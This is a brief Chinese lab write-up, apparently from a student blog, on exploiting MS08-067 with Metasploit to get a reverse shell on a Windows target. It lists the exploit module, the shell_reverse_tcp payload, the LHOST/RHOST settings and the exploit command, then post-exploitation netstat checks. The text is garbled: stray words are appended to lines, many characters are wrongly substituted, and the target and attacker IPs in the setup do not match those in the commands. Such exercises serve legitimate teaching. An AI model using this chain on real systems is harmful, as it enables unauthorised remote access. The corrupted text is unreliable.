###实验目的:使用Metaspoit攻击MS08-067,提交正确获得远程Shell过程的截图(很多于5张)shell
####靶机:192.168.11.231windows
####攻击机:192.168.11.131api
##实验步骤: ####1.首先攻击机和靶机互ping,在kali终端开启msfconsole 网络
####2.查找是否存在ms08_067漏洞,查看返回信息,会显示出找到的渗透模块tcp
####3.输入命令use exploit/windows/smb/ms08_067_netapi,进入利用该漏洞模块。接下来可输入一些命令来显示一些信息,如:操作系统
输入show payloads会显示出有效的攻击载荷,好比shell_reverse_tcp
使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷
输入show targets会显示出能够被攻击的靶机的操做系统型号
####4.输入show options显示咱们须要在攻击前须要设置的数据 code
####5.设置攻击机和靶机地址,并使用命令show options再次查看payload状态blog
输入命令set LHOST + 攻击机IP,即set LHOST 192.168.92.131; 输入命令set RHOST + 靶机IP,即set RHOST 192.168.92.231;
####6.输入命令exploit开始攻击,下图为正常攻击成功结果 ip
####7.在攻击机和靶机中分别查看IP地址,输入ipconfig/all,发现结果一致
get
####8.输入“netstat -a”命令,能够查看靶机开启了哪些端口
####9.输入“netstat -n”命令, 查看靶机端口的网络链接状况